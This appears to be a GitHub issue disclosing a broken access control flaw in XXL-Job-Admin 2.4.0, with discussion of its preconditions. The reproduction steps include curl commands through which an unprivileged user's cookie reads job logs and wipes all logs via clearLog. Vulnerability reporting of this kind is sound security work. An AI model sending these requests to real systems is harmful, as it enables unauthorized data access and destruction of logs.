75ACOL
commented
10 months ago Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
Open N0th1n3 opened 11 months ago
75ACOL
commented
10 months ago Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
N0th1n3
commented
10 months ago Agree. The assumption of the attack is that you gained an unprivileged account.
Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0 Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin) Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.
Steps to reproduce the behavior
Step 1: Create a normal user without any privilege inside the web console as below
Step 2: Retrieve the cookie for the user
Step 3: Run the following command for testing log query
It can show the successful log query and return 200 status.
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'Step 4: Run the following command for log clearing
it will return 200 status.
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.